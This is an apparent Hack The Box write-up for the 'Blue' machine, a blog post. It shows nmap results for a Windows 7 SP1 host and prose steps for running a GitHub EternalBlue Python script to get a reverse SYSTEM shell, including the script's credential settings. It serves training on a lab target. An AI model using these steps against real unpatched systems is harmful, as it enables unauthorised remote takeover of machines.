Open in app

Sign in

Write

Sign in

HTB — Blue

Raj Singh
3 min readSep 30, 2019

Machine Ip — 10.10.10.40

Nmap

PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: mean: -19m57s, deviation: 34m36s, median: 1s
| smb-os-discovery: 
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2019–09–13T12:26:29+01:00
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2019–09–13T11:26:32
|_ start_date: 2019–09–13T08:07:52

As we can see that with the os detection we are having windows 7 running at target machine , let’s try for eternal blue exploit ,but here we are not using metasploit for exploiting the macine we are going to find a python script for exploiting eternalblue

After searching for a while i got the python script at github it’s an automated script which will help us in getting shell with less amount of work power , now this script needs some modification which we are going to do

USERNAME = ‘/’           #{use / }
PASSWORD = ‘/’           #{use /}And before running the script download mysmb.py which you can easily get from google , and place the smb.py in the same directory where we are having eternal-blue python script

So what is this script doing , after looking inside i found that this script is automatically finding the architecture for the machine and then exploiting it , also generates a payload , and also it’s opens our nc as it asks everything we wanted to do manually so now let’s start the exploit

Enter machine ip , choose reverse shell , enter you ip where you want to listen , and enter the port respectively

And yup here we got out shell

Here are are system user having all the rights to move in

got user.txt and root.txt

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Hacking
Blues
Htb
Hackthebox
Hackers League

Raj Singh
Raj Singh

Written by Raj Singh

54 Followers
9 Following

Security Researcher, Product Security Engineer

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams